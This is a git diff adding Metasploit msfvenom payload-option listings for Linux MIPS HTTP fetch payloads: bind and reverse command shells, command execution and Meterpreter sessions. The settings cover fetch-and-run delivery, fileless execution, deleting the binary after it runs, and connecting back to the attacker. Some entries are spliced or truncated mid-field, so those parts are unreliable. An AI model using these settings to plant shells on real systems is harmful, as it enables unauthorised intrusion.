closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-mipsbe-shell_bind_tcp.txt b/msfvenom/payload_options/cmd-linux-http-mipsbe-shell_bind_tcp.txt new file mode 100644 index 0000000..6ec75f4 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-mipsbe-shell_bind_tcp.txt @@ -0,0 +1,74 @@ + + Name: HTTP Fetch, Linux Command Shell, Bind TCP Inline + Module: payload/cmd/linux/http/mipsbe/shell_bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + scut + vaicebine + Vlatko Kosturjak + juan vazquez + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME EtbkdTGdbo no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSBE payload from an HTTP server. + Listen for a connection and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-mipsbe-shell_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-mipsbe-shell_reverse_tcp.txt new file mode 100644 index 0000000..829a90d --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-mipsbe-shell_reverse_tcp.txt @@ -0,0 +1,79 @@ + + Name: HTTP Fetch, Linux Command Shell, Reverse TCP Inline + Module: payload/cmd/linux/http/mipsbe/shell_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + rigan + juan vazquez + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME LTdmakIVHUuT no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSBE payload from an HTTP server. + Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-mipsle-exec.txt b/msfvenom/payload_options/cmd-linux-http-mipsle-exec.txt new file mode 100644 index 0000000..ec54ec2 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-mipsle-exec.txt @@ -0,0 +1,70 @@ + + Name: HTTP Fetch, Linux Execute Command + Module: payload/cmd/linux/http/mipsle/exec + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Michael Messner + entropy + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD yes The command string to execute +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME BHtMUdPnuAr no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from an HTTP server. + + A very small shellcode for executing commands. + This module is sometimes helpful for testing purposes as well as + on targets with extremely limited buffer space. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-mipsle-meterpreter-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-mipsle-meterpreter-reverse_tcp.txt new file mode 100644 index 0000000..a9c0cab --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-mipsle-meterpreter-reverse_tcp.txt @@ -0,0 +1,100 @@ + + Name: HTTP Fetch, Reverse TCP Stager + Module: payload/cmd/linux/http/mipsle/meterpreter/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Norm +Evasion options for payload/cmd/linux/http/mipsle/meterpreter/reverse_tcp: +========================= + + juan vazquez + tkmru + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME UlqevxizRg no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from an HTTP server. + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-mipsle-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-http-mipsle-meterpreter_reverse_http.txt new file mode 100644 index 0000000..32d149a --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-mipsle-meterpreter_reverse_http.txt @@ -0,0 +1,104 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/mipsle/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/http/mipsle/meterpreter_reverse_http: +========================= + +ok@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME gfkVVWTotp no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-mipsle-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-http-mipsle-meterpreter_reverse_https.txt new file mode 100644 index 0000000..4882db7 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-mipsle-meterpreter_reverse_https.txt @@ -0,0 +1,106 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/mipsle/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + B +Evasion options for payload/cmd/linux/http/mipsle/meterpreter_reverse_https: +========================= + +@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME oKPKrTwiNTi no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-mipsle-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-mipsle-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..a2fc6b2 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-mipsle-meterpreter_reverse_tcp.txt @@ -0,0 +1,97 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/mipsle/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Adam Cammack + Brent Cook + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME cUPPonWYqDQ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see 